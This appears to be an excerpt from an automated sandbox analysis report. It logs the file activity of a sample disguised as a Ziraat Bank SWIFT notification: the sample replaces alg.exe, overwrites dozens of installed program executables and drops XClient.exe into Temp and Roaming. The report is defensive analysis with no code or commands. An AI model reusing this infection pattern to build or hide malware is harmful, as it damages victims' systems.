Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\Locator.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\SensorDataService.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe System file written: C:\Windows\System32\alg.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File created: C:\Users\user\AppData\Local\differences\niellist.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\Locator.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7z.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File created: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Local\Temp\build.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\SensorDataService.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\msdtc.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File created: C:\Windows\System32\alg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Local\Temp\XClient.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Users\user\AppData\Local\Temp\XClient.exe File created: C:\Users\user\AppData\Roaming\XClient.exe
